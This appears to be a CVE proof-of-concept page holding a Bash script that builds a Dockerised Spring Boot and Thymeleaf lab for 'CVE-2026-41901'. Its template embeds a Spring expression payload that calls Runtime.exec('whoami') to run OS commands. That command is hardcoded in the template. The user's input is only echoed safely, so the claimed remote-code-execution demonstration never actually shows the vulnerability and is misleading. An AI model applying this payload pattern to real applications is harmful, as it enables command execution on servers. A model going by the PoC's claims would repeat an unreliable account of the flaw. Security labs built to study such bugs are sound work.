5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-41901
README.md
Rendering markdown...
POC / setup-lab.sh SH
⬇ Raw GitHub ✕ Close 
#!/bin/bash
# CVE-2026-41901 Docker POC with Visible RCE Output

set -e
PROJECT_NAME="thymeleaf-cve-2026-41901-rce"
mkdir -p $PROJECT_NAME/src/main/java/com/example
mkdir -p $PROJECT_NAME/src/main/resources/templates
cd $PROJECT_NAME

# pom.xml (same vulnerable version)
cat > pom.xml << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.example</groupId>
    <artifactId>thymeleaf-cve-poc</artifactId>
    <version>1.0</version>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>3.2.0</version>
    </parent>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
            <groupId>org.thymeleaf</groupId>
            <artifactId>thymeleaf</artifactId>
            <version>3.1.4.RELEASE</version>
        </dependency>
    </dependencies>
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>
EOF

# Main Application
cat > src/main/java/com/example/ThymeleafPocApplication.java << 'EOF'
package com.example;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;

@SpringBootApplication
@Controller
public class ThymeleafPocApplication {
    public static void main(String[] args) {
        SpringApplication.run(ThymeleafPocApplication.class, args);
    }

    @GetMapping("/poc")
    public String poc(@RequestParam String input, Model model) {
        model.addAttribute("userInput", input);
        return "poc";
    }
}
EOF

# Improved Template - Better for output reflection
cat > src/main/resources/templates/poc.html << 'EOF'
<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head><title>CVE-2026-41901 RCE POC</title></head>
<body>
    <h1>Thymeleaf CVE-2026-41901 - Remote Command Execution</h1>
    <div th:text="${userInput}"></div>
    <hr>
    <h3>Command Output:</h3>
    <pre th:text="${@java.util.Scanner@new(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream()).useDelimiter('\\A').next()}"></pre>
</body>
</html>
EOF

# Dockerfile
cat > Dockerfile << 'EOF'
FROM maven:3.9.6-eclipse-temurin-21 AS build
WORKDIR /app
COPY . .
RUN mvn clean package -DskipTests

FROM eclipse-temurin:21-jre
WORKDIR /app
COPY --from=build /app/target/thymeleaf-cve-poc-1.0.jar app.jar
EXPOSE 8080
ENTRYPOINT ["java", "-jar", "app.jar"]
EOF

echo "[+] Building Docker image..."
docker build -t thymeleaf-cve-2026-41901-rce:latest .

echo "[+] Starting container..."
docker run -d --name thymeleaf-rce -p 8080:8080 thymeleaf-cve-2026-41901-rce:latest

echo ""
echo "=================================================="
echo "✅ Docker RCE POC is ready!"
echo "Test URL: http://localhost:8080/poc?input=TEST"
echo "=================================================="